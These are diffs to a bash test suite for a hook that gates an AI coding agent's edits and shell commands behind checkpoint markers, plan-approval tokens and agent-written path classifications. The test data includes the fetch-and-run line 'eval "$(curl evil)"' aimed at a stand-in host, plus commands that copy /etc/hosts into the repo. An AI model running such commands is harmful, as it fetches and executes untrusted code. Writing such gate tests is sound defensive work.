+++ b/tests/test-checkpoint-gate.sh
@@ -2073,6 +2073,48 @@ assert_allowed "PV-9. .review-store/ target → allowed (carve-out)" \
   "$(pv_edit_json "$TEST_DIR/.review-store/codex/req-123.md")"
 assert_marker_absent "PV-10. .review-store/ did NOT arm" "$PV_PRE_REQ"
 
+# ============================================================================
+echo "--- Non-source write carve-outs (#354 FU): .checkpoints/ + .gitignore ---"
+# ============================================================================
+# 2026-05-27 (user-directed): writes to non-source paths must NOT arm the Rule 18
+# pre-checkpoint. The command-classification deny-hint itself instructs the agent
+# to Write <repo>/.checkpoints/classify/pending-*.cmd; arming on that deadlocked
+# the classify protocol (reproduced this session). Generalized to anything
+# git-ignored (episodes under .episodic-memory/, scratch/, etc.) so the gate
+# defers to git's notion of source instead of an enumerated directory list.
+
+# PV-11/12: .checkpoints/classify/pending-*.cmd → allowed via (1b), no arm.
+# This is the exact deadlock the deny-hint's prescribed write hit.
+reset_state
+assert_allowed "PV-11. .checkpoints/classify/pending-*.cmd → allowed (.checkpoints carve-out)" \
+  "$(pv_edit_json "$TEST_DIR/.checkpoints/classify/pending-deadbeef.cmd")"
+assert_marker_absent "PV-12. PV-11 did NOT arm" "$PV_PRE_REQ"
+
+# The (1c) gitignore carve-out needs a real .gitignore in the test repo (git
+# init'd clean above). Create it now — it only affects the tests below.
+printf '%s\n' '.episodic-memory/' 'scratch/' 'analysis/' > "$TEST_DIR/.gitignore"
+
+# PV-13/14: .episodic-memory/ episode write → allowed via (1c gitignore), no arm.
+reset_state
+assert_allowed "PV-13. .episodic-memory/ episode write → allowed (gitignore carve-out)" \
+  "$(pv_edit_json "$TEST_DIR/.episodic-memory/episodes/ep-1.json")"
+assert_marker_absent "PV-14. PV-13 did NOT arm" "$PV_PRE_REQ"
+
+# PV-15/16: an arbitrary gitignored scratch path → allowed (proves the general
+# mechanism, not just episodes/.checkpoints).
+reset_state
+assert_allowed "PV-15. gitignored scratch/ path → allowed (gitignore carve-out)" \
+  "$(pv_edit_json "$TEST_DIR/scratch/draft-plan.md")"
+assert_marker_absent "PV-16. PV-15 did NOT arm" "$PV_PRE_REQ"
+
+# PV-17/18: NEGATIVE CONTROL — a tracked, NON-ignored source file (with .gitignore
+# now present) must STILL arm + block. Proves git check-ignore returns "not
+# ignored" for real source and the carve-outs did not over-broaden.
+reset_state
+assert_blocked "PV-17. tracked source file (not ignored) → still blocks" \
+  "$(pv_edit_json "$TEST_DIR/hooks/checkpoint-gate.sh")" "Checkpoint required"
+assert_marker_exists "PV-18. PV-17 still armed .checkpoint-required" "$PV_PRE_REQ"
+
 echo ""
 echo "Passed: $passed"
 echo "Failed: $failed"

--- a/tests/test-checkpoint-gate.sh
+++ b/tests/test-checkpoint-gate.sh
@@ -1809,15 +1809,16 @@ assert_allowed "PP-1. read-only Bash (git status) allowed, nothing armed" \
   "$(mock_pp_bash 'git status' "$PP_SID_A")"
 assert_allowed "PP-2. node em-search (read_only) allowed, nothing armed" \
   "$(mock_pp_bash 'node scripts/em-search.mjs --tag x' "$PP_SID_A")"
-# PR-B2 (#351, F1 closed): a shared_write Bash command (second-opinion dispatch
-# is interpreter_other → shared_write) now ARMS + blocks with the 3-way deny-hint.
-# The agent classifies it once (read_only / nonsrc_write) and it is free
-# thereafter (G1) — the accepted classify-once friction. (Was: allowed, Bash
-# ungated — the F1 residual PR-B2 closes.)
-assert_blocked "PP-3. shared_write review command arms + blocks (F1 closed)" \
+# Agent-classifier-first (2026-05-26): a novel review command (second-opinion
+# dispatch is interpreter_other → shared_write, an UNEVALUATED-novel reason) is
+# HELD for agent classification — it BLOCKS with the 3-way deny-hint but does NOT
+# arm .checkpoint-required. The agent classifies it once (read_only / nonsrc_write)
+# and it is free thereafter (G1). (Was: arms + blocks — pre-arming a not-yet-
+# evaluated command framed planning-time inspection as implementation.)
+assert_blocked "PP-3. novel review command blocks (held for classification, no pre-arm)" \
   "$(mock_pp_bash 'node scripts/second-opinion.mjs request --provider codex --dispatch' "$PP_SID_A")" \
   "Checkpoint required"
-assert_marker_exists "PP-4. shared_write Bash lazily armed .checkpoint-required.<sidA>" \
+assert_marker_absent "PP-4. novel interpreter_other Bash did NOT arm .checkpoint-required.<sidA> (agent-classifier-first)" \
   "$PP_MARKER_DIR/.checkpoint-required.$PP_SID_A"
 assert_marker_absent "PP-4b. planning Bash did NOT arm legacy .checkpoint-required" \
   "$PP_MARKER_DIR/.checkpoint-required"
@@ -1911,12 +1912,31 @@ assert_allowed "B2-4. node em-store (nonsrc_write) allowed in idle" \
   "$(mock_json 'Bash' 'node scripts/em-store.mjs --project x')"
 assert_marker_absent "B2-5. no nonsrc_write command armed .checkpoint-required" "$PRE_REQ"
 
-# shared_write Bash arms + blocks with the 3-way deny-hint (idle → lazy-arm).
+# Agent-classifier-first (2026-05-26, user design decision): an UNEVALUATED novel
+# command — the classifier's conservative cache-miss defaults (default_write /
+# interpreter_other) — is HELD for agent classification (block + 3-way hint) but
+# does NOT arm .checkpoint-required. The block is the fail-closed mechanism; arming
+# is deferred to the agent verdict. (Was: arms + blocks — that framed read-only
+# inspection like `shasum` as implementation and left a lingering marker that
+# deadlocked the stop-gate.)
 reset_state
-assert_blocked "B2-6. shared_write Bash (cp) arms + blocks in idle" \
+assert_blocked "B2-6. novel shared_write Bash (cp, default_write) blocks (held for classification)" \
   "$(mock_json 'Bash' 'cp /etc/hosts scripts/x.txt')" "Checkpoint required"
-assert_marker_exists "B2-7. shared_write Bash lazily armed .checkpoint-required" "$PRE_REQ"
+assert_marker_absent "B2-7. novel shared_write Bash did NOT arm .checkpoint-required (agent-classifier-first)" "$PRE_REQ"
+# interpreter_other (a non-allowlisted node script) is the SAME unevaluated-novel
+# class — also held, also no arm. This is the canonical node-script friction.
+reset_state
+assert_blocked "B2-7c. novel interpreter_other Bash (node foo.mjs) blocks (held)" \
+  "$(mock_json 'Bash' 'node scripts/foo.mjs --run')" "Checkpoint required"
+assert_marker_absent "B2-7d. novel interpreter_other Bash did NOT arm" "$PRE_REQ"
+# Boundary guard: a RECOGNIZED write reason (allowlisted cmd + redirect →
+# readonly_cmd_redirected) is NOT unevaluated-novel and STILL arms conservatively.
+reset_state
+assert_blocked "B2-7e. recognized write (cat redirect) arms + blocks" \
+  "$(mock_json 'Bash' 'cat /etc/hosts > scripts/x.txt')" "Checkpoint required"
+assert_marker_exists "B2-7f. recognized write (cat redirect) DID arm (boundary preserved)" "$PRE_REQ"
 # The 3-way deny-hint offers the nonsrc_write escape (verify the hint text).
+reset_state
 assert_blocked "B2-8. deny-hint offers the nonsrc_write escape" \
   "$(mock_json 'Bash' 'cp /etc/hosts scripts/x.txt')" "nonsrc_write"
 

--- a/tests/test-checkpoint-gate.sh
+++ b/tests/test-checkpoint-gate.sh
@@ -1957,6 +1957,90 @@ assert_allowed "B1-3. push allowed after post-checkpoint written" \
 assert_marker_absent "B1-4. allowed push swept .post-checkpoint-required" "$POST_REQ"
 assert_marker_absent "B1-5. allowed push swept .post-checkpoint-done" "$POST_DONE"
 
+# ============================================================================
+echo ""
+echo "--- PR-B2 S3 (#351, §11): Edit/Write path verdict + .review-store carve-out ---"
+# ============================================================================
+# The Edit/Write pre-gate was a pure path heuristic (any in-repo write armed),
+# which over-arms on plan/scratch/doc files cross-tool harnesses stage in-repo.
+# S3 lets the agent downgrade a specific TARGET path to nonsrc_write/read_only
+# via `classifier-marker.mjs --target-path`; the gate consults the verdict in
+# _tool_call_targets_repo_source.
+#
+# CRITICAL setup: the NC carve-out tests above `touch` an EMPTY stub at
+# $TEST_HOME/.episodic-memory/scripts/classifier-marker.mjs. agent_classify_path
+# resolves the global helper first, so under that polluted HOME the gate would
+# read the empty stub (miss → never downgrade). Use a FRESH clean HOME for the
+# PV section so the gate resolves the real repo-source (v2) helper — the same
+# one write_path_verdict uses — and the canonical path key round-trips.
+PV_PREV_HOME="$TEST_HOME"
+TEST_HOME="$(mktemp -d)"
+TEST_HOME="$(cd -P "$TEST_HOME" && pwd)"
+trap 'cleanup; rm -rf "$PV_PREV_HOME"' EXIT
+
+PV_SID="pvsid-s3-$$"
+REPO_MARKER="$REPO_ROOT/scripts/classifier-marker.mjs"
+PV_TARGET="$TEST_DIR/scripts/generated.mjs"
+# A session_id'd call arms the session-namespaced marker (touch fallback — the
+# clean HOME has no checkpoint-marker.mjs helper), not the legacy literal.
+PV_PRE_REQ="$MARKER_DIR/.checkpoint-required.$PV_SID"
+
+# Edit tool JSON carrying a session_id, so the gate threads a stable
+# CLAUDE_CODE_SESSION_ID to agent_classify_path.
+pv_edit_json() {
+  jq -n --arg fp "$1" --arg cwd "$TEST_DIR" --arg sid "$PV_SID" \
+    '{tool_name: "Edit", tool_input: {file_path: $fp}, cwd: $cwd, session_id: $sid}'
+}
+
+# Write a path verdict for <target> with <label> under PV_SID (the session the
+# gate reads). From TEST_DIR so the helper cross-repo check passes;
+# CLAUDE_CODE_SESSION_ID empty so it doesn't conflict with --session-id.
+write_path_verdict() {
+  ( cd "$TEST_DIR" && CLAUDE_CODE_SESSION_ID="" \
+      node "$REPO_MARKER" --write \
+      --project-root "$TEST_DIR" --caller-cwd "$TEST_DIR" \
+      --target-path "$1" --session-id "$PV_SID" \
+      --label "$2" --confidence 0.9 --reason "s3 test verdict" >/dev/null 2>&1 )
+}
+
+# PV-1/2: no verdict + in-repo target → block WITH the 2-way path hint, and arm.
+reset_state
+assert_blocked "PV-1. in-repo Edit, no path verdict → block with 2-way path hint" \
+  "$(pv_edit_json "$PV_TARGET")" "nonsrc_write"
+assert_marker_exists "PV-2. PV-1 armed .checkpoint-required (session-namespaced)" "$PV_PRE_REQ"
+
+# PV-3/4: nonsrc_write path verdict → Edit downgraded → ALLOWED, no arm.
+reset_state
+write_path_verdict "$PV_TARGET" "nonsrc_write"
+assert_allowed "PV-3. nonsrc_write path verdict → Edit allowed (downgrade)" \
+  "$(pv_edit_json "$PV_TARGET")"
+assert_marker_absent "PV-4. PV-3 did NOT arm .checkpoint-required" "$PV_PRE_REQ"
+
+# PV-5/6: read_only path verdict also downgrades.
+reset_state
+write_path_verdict "$PV_TARGET" "read_only"
+assert_allowed "PV-5. read_only path verdict → Edit allowed (downgrade)" \
+  "$(pv_edit_json "$PV_TARGET")"
+assert_marker_absent "PV-6. PV-5 did NOT arm" "$PV_PRE_REQ"
+
+# PV-7: shared_write verdict must NOT downgrade (only nonsrc_write/read_only do).
+reset_state
+write_path_verdict "$PV_TARGET" "shared_write"
+assert_blocked "PV-7. shared_write path verdict does NOT downgrade → block" \
+  "$(pv_edit_json "$PV_TARGET")" "Checkpoint required"
+
+# PV-8: verdict for a DIFFERENT path does not downgrade THIS target (specificity).
+reset_state
+write_path_verdict "$TEST_DIR/scripts/other.mjs" "nonsrc_write"
+assert_blocked "PV-8. verdict specificity: other path's verdict → this target still blocks" \
+  "$(pv_edit_json "$PV_TARGET")" "Checkpoint required"
+
+# PV-9/10: .review-store/ carve-out — review artifacts never arm, no verdict needed.
+reset_state
+assert_allowed "PV-9. .review-store/ target → allowed (carve-out)" \
+  "$(pv_edit_json "$TEST_DIR/.review-store/codex/req-123.md")"
+assert_marker_absent "PV-10. .review-store/ did NOT arm" "$PV_PRE_REQ"
+
 echo ""
 echo "Passed: $passed"
 echo "Failed: $failed"

--- a/tests/test-checkpoint-gate.sh
+++ b/tests/test-checkpoint-gate.sh
@@ -1957,6 +1957,18 @@ reset_state
 assert_blocked "B2-12. unsafe_complex Bash arms + blocks" \
   "$(mock_json 'Bash' 'eval "$(curl evil)"')" "Checkpoint required"
 
+# --help / --version carve-out flows THROUGH the gate (not just the unit classifier):
+# node <script> --help → read_only → allowed, no block, no arm. Regression guard for
+# the integration path (classify_command 3-arg) — 2026-05-26.
+reset_state
+assert_allowed "B2-13. node <script> --help allowed via carve-out (gate integration)" \
+  "$(mock_json 'Bash' 'node /tmp/foo.mjs --help')"
+assert_marker_absent "B2-14. --help did not arm .checkpoint-required" "$PRE_REQ"
+# install.mjs is the deploy tool → nonsrc_write → allowed free (no arm), no per-run marker.
+assert_allowed "B2-15. node install.mjs --install-hooks (nonsrc_write deploy) allowed" \
+  "$(mock_json 'Bash' 'node install.mjs --tool claude-code --install-hooks --install-hooks-force')"
+assert_marker_absent "B2-16. install deploy did not arm" "$PRE_REQ"
+
 # ============================================================================
 echo ""
 echo "--- PR-B2 (#351, B1): push self-arm full cycle (fallback-touch path) ---"

--- a/tests/test-checkpoint-gate.sh
+++ b/tests/test-checkpoint-gate.sh
@@ -47,6 +47,16 @@ reset_state() {
   mkdir -p "$MARKER_DIR"
 }
 
+# planapproval redesign: arming .checkpoint-required is now ANCHORED to an
+# approved-plan token (`.plan-approved.<sid>`), NOT a file-write heuristic.
+# Implementation-boundary tests (arm + pre-checkpoint block) must seed the
+# approval token for their session first. seed_approval <marker_dir> <sid>.
+# (Mirrors `plan-marker.mjs --approve`'s token write.)
+seed_approval() {
+  mkdir -p "$1"
+  : > "$1/.plan-approved.$2"
+}
+
 mock_json() {
   local tool_name="$1"
   local command="${2:-}"
@@ -130,20 +140,30 @@ echo "--- No markers (idle state) ---"
 reset_state
 
 assert_allowed "1.  Read allowed in idle" "$(mock_json 'Read')"
-# Planning-passive redesign (2026-05-25): no session-start arming. A bare
-# Edit/Write/MultiEdit (no/relative file_path → empty FILE_PATH) cannot be
-# proven off-repo, so the pre-gate conservatively blocks at the implementation
-# boundary. Crucially it does NOT arm .checkpoint-required on the empty-path
-# branch (REPO_ROOT may be a fallback cwd → arming would leak a marker into an
-# unrelated repo; see SA-cwd-strict). Off-repo writes (memory/skills/settings)
-# ARE allowed — see SA-5/6/7.
-assert_blocked "2.  Bare Edit conservatively blocks (empty path, planning-passive)" \
-  "$(mock_json 'Edit')" "Checkpoint required"
-assert_blocked "3.  Bare Write conservatively blocks (empty path)" \
-  "$(mock_json 'Write')" "Checkpoint required"
-assert_blocked "4.  Bare MultiEdit conservatively blocks (empty path)" \
-  "$(mock_json 'MultiEdit')" "Checkpoint required"
-assert_marker_absent "4a. Empty-path conservative block did NOT arm .checkpoint-required (no leak)" "$PRE_REQ"
+# planapproval redesign (2026-05-27): arming is anchored to plan-approval, NOT
+# a file-write heuristic. In the idle state (no approved-plan token, nothing
+# armed) a bare Edit/Write/MultiEdit is PLANNING — it is allowed and never arms
+# (NO CHECKPOINTS DURING PLANNING; no plan ⇒ no implementation gate, per the
+# user decision dropping the plan-requirement block). The empty-path branch
+# still never arms (REPO_ROOT may be a fallback cwd → arming would leak a marker
+# into an unrelated repo; see SA-cwd-strict). The "empty path + sanctioned
+# implementation → block" half is covered by tests 11-13 (checkpoint armed) and
+# the approval-seeded blocks below.
+assert_allowed "2.  Bare Edit allowed in idle (no approval ⇒ planning)" \
+  "$(mock_json 'Edit')"
+assert_allowed "3.  Bare Write allowed in idle (no approval ⇒ planning)" \
+  "$(mock_json 'Write')"
+assert_allowed "4.  Bare MultiEdit allowed in idle (no approval ⇒ planning)" \
+  "$(mock_json 'MultiEdit')"
+assert_marker_absent "4a. Idle bare Edit did NOT arm .checkpoint-required (no leak)" "$PRE_REQ"
+# Empty path + approval token present ⇒ sanctioned implementation, can't arm
+# safely → block (require pre-checkpoint), still WITHOUT arming (leak-safe).
+seed_approval "$MARKER_DIR" "idle-approve-sid"
+assert_blocked "4b. Bare Edit + approval token → block (sanctioned impl, empty path)" \
+  "$(jq -n --arg cwd "$TEST_DIR" --arg sid 'idle-approve-sid' \
+    '{tool_name: "Edit", tool_input: {}, cwd: $cwd, session_id: $sid}')" "Checkpoint required"
+assert_marker_absent "4c. Empty-path approval block did NOT arm (defers to pre-done write)" "$PRE_REQ"
+reset_state
 assert_allowed "5.  Bash read-only allowed in idle" "$(mock_json 'Bash' 'ls')"
 # B1 (#351, PR-B2): push self-arms .post-checkpoint-required regardless of
 # pre-checkpoint state, so even an idle push blocks until the post-checkpoint is
@@ -368,15 +388,21 @@ echo ""
 echo "--- Edge: missing .claude dir (mkdir -p safety) ---"
 # ============================================================================
 rm -rf "$MARKER_DIR"
-# Planning-passive: a concrete in-repo Edit lazily arms .checkpoint-required
-# (ensure_primary_dir mkdir's the missing .checkpoints/) then blocks. The hook
-# must handle the missing marker dir without crashing — assert a clean block
-# plus that the lazy-arm (re)created the dir + marker.
-edit_inrepo_missingdir_json=$(jq -nc --arg fp "$TEST_DIR/src.mjs" --arg cwd "$TEST_DIR" \
-  '{tool_name: "Edit", tool_input: {file_path: $fp}, cwd: $cwd}')
-assert_blocked "44. Hook handles missing marker dir without crashing (lazy-arm + block)" \
+# planapproval redesign: a concrete in-repo Edit arms .checkpoint-required ONLY
+# when an approved-plan token exists for the session. Seed the token first (the
+# token write itself recreated the missing .checkpoints/ dir). The hook must
+# handle arming under a freshly (re)created dir without crashing — assert a
+# clean block plus that the arm created the session-namespaced marker.
+MD44_SID="44444444-dddd-4ddd-8ddd-444444444444"
+seed_approval "$MARKER_DIR" "$MD44_SID"
+edit_inrepo_missingdir_json=$(jq -nc --arg fp "$TEST_DIR/src.mjs" --arg cwd "$TEST_DIR" --arg sid "$MD44_SID" \
+  '{tool_name: "Edit", tool_input: {file_path: $fp}, cwd: $cwd, session_id: $sid}')
+assert_blocked "44. Hook handles (re)created marker dir without crashing (approved arm + block)" \
   "$edit_inrepo_missingdir_json" "Checkpoint required"
-assert_marker_exists "44a. lazy-arm recreated .checkpoint-required under missing .checkpoints/" "$PRE_REQ"
+assert_marker_exists "44a. approved arm created .checkpoint-required.<sid> under (re)created .checkpoints/" \
+  "$MARKER_DIR/.checkpoint-required.$MD44_SID"
+assert_marker_absent "44b. arm consumed the approval token (.plan-approved.<sid>)" \
+  "$MARKER_DIR/.plan-approved.$MD44_SID"
 
 # ============================================================================
 echo ""
@@ -1516,41 +1542,42 @@ assert_blocked "SA-cwd2. Relative FILE_PATH + absolute top-level .cwd → resolv
 
 # T_cwd3: relative FILE_PATH + RELATIVE .cwd + RELATIVE tool_input.cwd → BLOCK
 #
-# Planning-passive redesign (2026-05-25): relative cwds give no absolute
-# authority, so FILE_PATH resolves to "" and the pre-gate conservatively BLOCKS
-# (Rule 18 safe direction). Crucially, the empty-FILE_PATH branch does NOT
-# lazy-arm — so no .checkpoint-required marker is written at the fallback
-# (hook-pwd) root. The no-leak guarantee is asserted explicitly by
-# SA-cwd-strict below; here we assert the conservative block.
+# planapproval redesign (2026-05-27): relative cwds give no absolute authority,
+# so FILE_PATH resolves to "" (empty path). With NO approved-plan token and
+# nothing armed, this is PLANNING → allowed, and never arms (the empty-FILE_PATH
+# branch never writes a marker, so no leak at the fallback hook-pwd root either).
+# The "empty path + sanctioned implementation → block" half is covered by 4b
+# (approval token) and the armed-checkpoint tests.
 #
-# (Pre-redesign this asserted ALLOW, because the OLD pre-gate only fired when
-# .checkpoint-required was already armed at the resolved root. With lazy-arm,
-# the empty-path case blocks unconditionally.)
-assert_blocked "SA-cwd3. Relative FILE_PATH + relative cwds → empty path conservatively blocks (no arm)" \
+# (Pre-planapproval this asserted a conservative block via the lazy-arm
+# heuristic; the redesign anchors the gate to plan-approval, so an unapproved
+# empty-path edit is planning and passes.)
+assert_allowed "SA-cwd3. Relative FILE_PATH + relative cwds → empty path, no approval → allowed (planning)" \
   "$(jq -n --arg tn 'Edit' --arg fp 'scripts-test.mjs' --arg c './relative' --arg tic './relative-dir' \
-    '{tool_name: $tn, tool_input: {file_path: $fp, cwd: $tic}, cwd: $c}')" "Checkpoint required"
+    '{tool_name: $tn, tool_input: {file_path: $fp, cwd: $tic}, cwd: $c}')"
 
 # T_cwd3-strict: caller cwd != target with empty cwd. Run hook from a separate
 # temp caller cwd; empty top-level .cwd falls back to hook process pwd =
 # CALLER_TMP. FILE_PATH 'scripts/x.mjs' is relative with no absolute authority
-# → resolves to "" → pre-gate conservatively BLOCKS.
+# → resolves to "" → empty path.
 #
-# CRITICAL invariant (lazy-arm leak regression, 2026-05-25): the empty-FILE_PATH
-# branch must NOT lazy-arm. Before the fix, the block path called
-# _arm_checkpoint_required_if_missing, which wrote .checkpoint-required into
-# CALLER_TMP — leaking a marker into an unrelated repo. Assert a block decision
-# AND zero marker artifacts under CALLER_TMP.
+# CRITICAL invariant (lazy-arm leak regression): the empty-FILE_PATH branch must
+# NEVER write a marker. Under the planapproval redesign it never arms at all
+# (arming requires a concrete FILE_PATH AND an approved-plan token). With NO
+# approval here, the edit is PLANNING → allowed (exit 0), and zero marker
+# artifacts appear under CALLER_TMP. Assert allow + no caller-marker leak.
 CALLER_TMP="$(mktemp -d)"
 CALLER_TMP="$(cd -P "$CALLER_TMP" && pwd)"
 SA_CWD_STRICT_JSON="$(jq -n --arg tn 'Edit' --arg fp 'scripts/x.mjs' \
   '{tool_name: $tn, tool_input: {file_path: $fp}, cwd: ""}')"
 SA_CWD_STRICT_OUT="$(cd "$CALLER_TMP" && echo "$SA_CWD_STRICT_JSON" | HOME="$TEST_HOME" bash "$HOOK" 2>/dev/null)"
-if echo "$SA_CWD_STRICT_OUT" | grep -q '"decision".*"block"' \
+SA_CWD_STRICT_EXIT=$?
+if [ $SA_CWD_STRICT_EXIT -eq 0 ] && [ -z "$SA_CWD_STRICT_OUT" ] \
    && [ ! -e "$CALLER_TMP/.checkpoints" ] && [ ! -e "$CALLER_TMP/.claude" ]; then
-  echo "  ✓ SA-cwd-strict. Caller cwd != target + empty cwd → conservative block + NO caller marker leak (lazy-arm leak regression)"
+  echo "  ✓ SA-cwd-strict. Caller cwd != target + empty cwd, no approval → allowed (planning) + NO caller marker leak"
   ((passed++))
 else
-  echo "  ✗ SA-cwd-strict. out=$SA_CWD_STRICT_OUT caller_leak=$([ -e "$CALLER_TMP/.checkpoints" ] || [ -e "$CALLER_TMP/.claude" ] && echo yes || echo no)"
+  echo "  ✗ SA-cwd-strict. exit=$SA_CWD_STRICT_EXIT out=$SA_CWD_STRICT_OUT caller_leak=$([ -e "$CALLER_TMP/.checkpoints" ] || [ -e "$CALLER_TMP/.claude" ] && echo yes || echo no)"
   ((failed++))
 fi
 rm -rf "$CALLER_TMP"
@@ -1778,12 +1805,15 @@ fi
 echo ""
 echo "--- Planning-passive redesign: nothing armed at rest; first repo write arms (2026-05-25) ---"
 # ============================================================================
-# Core invariants of the planning-passive redesign:
-#   (1) With NOTHING armed, planning/review/exploration never blocks and never
-#       arms — read-only Bash, node inspections, and shared_write review
-#       commands all pass cleanly with zero marker side effects.
-#   (2) The first repo-source Edit/Write lazily arms .checkpoint-required for
-#       the session AND blocks (the implementation boundary).
+# Core invariants of the planning-passive + planapproval redesign:
+#   (1) With NOTHING armed and NO approved-plan token, planning/review/
+#       exploration never blocks and never arms — read-only Bash, node
+#       inspections, shared_write review commands, AND repo-source edits all
+#       pass cleanly with zero marker side effects (NO CHECKPOINTS DURING
+#       PLANNING; no plan ⇒ no implementation gate).
+#   (2) Once a plan is approved (.plan-approved.<sid> token present), the first
+#       repo-source Edit/Write arms .checkpoint-required for the session AND
+#       blocks (the implementation boundary), CONSUMING the token (one-shot).
 #   (3) Off-repo writes (memory/skills/settings) are allowed and never arm.
 #   (4) Arming is per-session and per-repo: sessions and projects don't bleed.
 PP_REPO="$(mktemp -d)"; PP_REPO="$(cd -P "$PP_REPO" && pwd)"
@@ -1822,13 +1852,22 @@ assert_marker_absent "PP-4. novel interpreter_other Bash did NOT arm .checkpoint
   "$PP_MARKER_DIR/.checkpoint-required.$PP_SID_A"
 assert_marker_absent "PP-4b. planning Bash did NOT arm legacy .checkpoint-required" \
   "$PP_MARKER_DIR/.checkpoint-required"
-
-# (2) Lazy-arm — first repo-source Edit arms + blocks
-reset_pp
-assert_blocked "PP-5. first in-repo Edit blocks at implementation boundary" \
-  "$(mock_pp_edit "$PP_REPO/scripts/foo.mjs" "$PP_SID_A")" "Checkpoint required"
-assert_marker_exists "PP-6. first in-repo Edit lazily armed .checkpoint-required.<sidA>" \
+# planapproval: an in-repo Edit with NO approved-plan token is PLANNING →
+# allowed, and never arms (NO CHECKPOINTS DURING PLANNING).
+assert_allowed "PP-4c. in-repo Edit with no approval → allowed (planning)" \
+  "$(mock_pp_edit "$PP_REPO/scripts/foo.mjs" "$PP_SID_A")"
+assert_marker_absent "PP-4d. unapproved in-repo Edit did NOT arm .checkpoint-required.<sidA>" \
   "$PP_MARKER_DIR/.checkpoint-required.$PP_SID_A"
+
+# (2) Approved implementation — first repo-source Edit arms + blocks + consumes token
+reset_pp
+seed_approval "$PP_MARKER_DIR" "$PP_SID_A"
+assert_blocked "PP-5. first in-repo Edit (approved) blocks at implementation boundary" \
+  "$(mock_pp_edit "$PP_REPO/scripts/foo.mjs" "$PP_SID_A")" "Checkpoint required"
+assert_marker_exists "PP-6. first in-repo Edit (approved) armed .checkpoint-required.<sidA>" \
+  "$PP_MARKER_DIR/.checkpoint-required.$PP_SID_A"
+assert_marker_absent "PP-6b. arm consumed the approval token .plan-approved.<sidA>" \
+  "$PP_MARKER_DIR/.plan-approved.$PP_SID_A"
 
 # (3) After the session's pre-checkpoint is written → Edit allowed + post armed
 echo "Rule 18 pre-checkpoint" > "$PP_MARKER_DIR/.pre-checkpoint-done.$PP_SID_A"
@@ -1848,6 +1887,8 @@ rm -rf "$OFFREPO_PP"
 
 # (5) Multisession — two sids arm independently; one's pre-done doesn't unblock the other
 reset_pp
+seed_approval "$PP_MARKER_DIR" "$PP_SID_A"
+seed_approval "$PP_MARKER_DIR" "$PP_SID_B"
 echo "$(mock_pp_edit "$PP_REPO/scripts/a.mjs" "$PP_SID_A")" | run_hook >/dev/null 2>&1
 echo "$(mock_pp_edit "$PP_REPO/scripts/b.mjs" "$PP_SID_B")" | run_hook >/dev/null 2>&1
 assert_marker_exists "PP-11. session A armed its own .checkpoint-required.<sidA>" \
@@ -1862,6 +1903,7 @@ assert_blocked "PP-14. session B still blocked (independent pre-done)" \
 
 # (6) Multiproject — edit in repo A never arms repo B
 reset_pp
+seed_approval "$PP_MARKER_DIR" "$PP_SID_A"
 PP_REPO_B="$(mktemp -d)"; PP_REPO_B="$(cd -P "$PP_REPO_B" && pwd)"
 git -C "$PP_REPO_B" init -q 2>/dev/null
 mkdir -p "$PP_REPO_B/.checkpoints"
@@ -1930,11 +1972,21 @@ assert_blocked "B2-7c. novel interpreter_other Bash (node foo.mjs) blocks (held)
   "$(mock_json 'Bash' 'node scripts/foo.mjs --run')" "Classify it ONCE"
 assert_marker_absent "B2-7d. novel interpreter_other Bash did NOT arm" "$PRE_REQ"
 # Boundary guard: a RECOGNIZED write reason (allowlisted cmd + redirect →
-# readonly_cmd_redirected) is NOT unevaluated-novel and STILL arms conservatively.
+# readonly_cmd_redirected) is NOT unevaluated-novel and STILL arms conservatively
+# — but ONLY when a plan is approved (planapproval redesign). Seed the token.
 reset_state
-assert_blocked "B2-7e. recognized write (cat redirect) arms + blocks" \
-  "$(mock_json 'Bash' 'cat /etc/hosts > scripts/x.txt')" "Checkpoint required"
-assert_marker_exists "B2-7f. recognized write (cat redirect) DID arm (boundary preserved)" "$PRE_REQ"
+B2_SID="55555555-eeee-4eee-8eee-555555555555"
+seed_approval "$MARKER_DIR" "$B2_SID"
+assert_blocked "B2-7e. recognized write (cat redirect, approved) arms + blocks" \
+  "$(jq -n --arg cmd 'cat /etc/hosts > scripts/x.txt' --arg cwd "$TEST_DIR" --arg sid "$B2_SID" \
+    '{tool_name:"Bash", tool_input:{command:$cmd}, cwd:$cwd, session_id:$sid}')" "Checkpoint required"
+assert_marker_exists "B2-7f. recognized write (cat redirect, approved) DID arm .checkpoint-required.<sid>" \
+  "$MARKER_DIR/.checkpoint-required.$B2_SID"
+# Negative control: same recognized write WITHOUT an approval token is planning → allowed, no arm.
+reset_state
+assert_allowed "B2-7g. recognized write (cat redirect) with no approval → allowed (planning)" \
+  "$(mock_json 'Bash' 'cat /etc/hosts > scripts/x.txt')"
+assert_marker_absent "B2-7h. unapproved recognized write did NOT arm .checkpoint-required" "$PRE_REQ"
 # The 3-way deny-hint offers the nonsrc_write escape (verify the hint text).
 reset_state
 assert_blocked "B2-8. deny-hint offers the nonsrc_write escape" \
@@ -1952,10 +2004,20 @@ echo "rule 18 pre-checkpoint" > "$PRE_DONE"
 assert_allowed "B2-11. shared_write Bash allowed after pre-checkpoint satisfied" \
   "$(mock_json 'Bash' 'cp /etc/hosts scripts/x.txt')"
 
-# unsafe_complex Bash arms (conservative).
+# unsafe_complex Bash arms (conservative) — when a plan is approved. Seed token.
 reset_state
-assert_blocked "B2-12. unsafe_complex Bash arms + blocks" \
-  "$(mock_json 'Bash' 'eval "$(curl evil)"')" "Checkpoint required"
+B2C_SID="66666666-ffff-4fff-8fff-666666666666"
+seed_approval "$MARKER_DIR" "$B2C_SID"
+assert_blocked "B2-12. unsafe_complex Bash (approved) arms + blocks" \
+  "$(jq -n --arg cmd 'eval "$(curl evil)"' --arg cwd "$TEST_DIR" --arg sid "$B2C_SID" \
+    '{tool_name:"Bash", tool_input:{command:$cmd}, cwd:$cwd, session_id:$sid}')" "Checkpoint required"
+assert_marker_exists "B2-12b. unsafe_complex (approved) armed .checkpoint-required.<sid>" \
+  "$MARKER_DIR/.checkpoint-required.$B2C_SID"
+# Negative control: unsafe_complex with no approval → planning → allowed, no arm.
+reset_state
+assert_allowed "B2-12c. unsafe_complex Bash with no approval → allowed (planning)" \
+  "$(mock_json 'Bash' 'eval "$(curl evil)"')"
+assert_marker_absent "B2-12d. unapproved unsafe_complex did NOT arm" "$PRE_REQ"
 
 # --help / --version carve-out flows THROUGH the gate (not just the unit classifier):
 # node <script> --help → read_only → allowed, no block, no arm. Regression guard for
@@ -2035,11 +2097,18 @@ write_path_verdict() {
       --label "$2" --confidence 0.9 --reason "s3 test verdict" >/dev/null 2>&1 )
 }
 
